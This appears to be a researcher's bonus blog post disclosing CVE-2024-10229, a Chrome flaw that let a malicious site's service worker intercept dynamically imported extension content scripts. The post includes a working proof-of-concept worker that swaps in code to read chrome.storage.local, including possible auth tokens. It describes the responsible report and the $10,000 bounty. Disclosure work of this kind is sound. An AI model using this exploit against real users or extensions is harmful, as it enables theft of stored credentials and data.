Skip to main content

CVE-2024-10229

Note

This is a bonus article describing a CVE in Chrome that allowed me to bypass Context Isolation.

Overview

At the end of 2024, I found a vulnerability in Chrome that allowed an attacker's site to execute scripts within the Content Script of vulnerable extensions.

If you have read the content of this site, you should remember that usually, a content script is injected through the manifest. However, I discovered that many large extensions (for example, 1Password) use the following logic:

(function () {
    'use strict';
  
    const injectTime = performance.now();
    (async () => {
      const { onExecute } = await import(
        /* @vite-ignore */
        chrome.runtime.getURL("assets/example.js")
      );
      onExecute?.({ perf: { injectTime, loadTime: performance.now() - injectTime } });
    })().catch(console.error);
  
  })();

That is, they dynamically request scripts from the content script. Studying the browser's behavior, I realized that the developers made a mistake. Usually, all traffic from the content script originating from the Isolated World, as you can guess, is isolated. For example, an application cannot intercept a fetch request originating from the content script. However, this logic was not implemented for import...

Let's Exploit

After we understood that import is not isolated, a simple plan emerges:

  • Register a service worker on your page.
  • Intercept the script and replace its content with your own.

In practice, this looked like this:

self.addEventListener("fetch", (event) => {
    console.log(`Handling fetch event for ${event.request.url}!`);
    if(event.request.url.indexOf("chrome-extension") === -1){
        event.respondWith(fetch(event.request.url));
        return;
    }
    if(event.request.url.indexOf("chrome-extension") != -1){
        var a = new Response(`(async function foo() {
            window.slonser=JSON.stringify(await chrome.storage.local.get());

            document.body.innerHTML='I was stealing your storage:'+window.slonser; 
          })();`, {
          headers: {'Content-Type': 'text/javascript', 'Access-Control-Allow-Origin':"*"}
        })
        event.respondWith(
            a
         )
        return;
    }
    return;
});

Accordingly, by running such a worker on your site, you could steal user data (I discovered quite a few extensions that stored auth tokens in storage, LOL) and sometimes even achieve UXSS (but you probably guessed this if you read this site).

Let's report

I reported this issue to the Chrome security team. Within a week, it was resolved, and I received $10,000.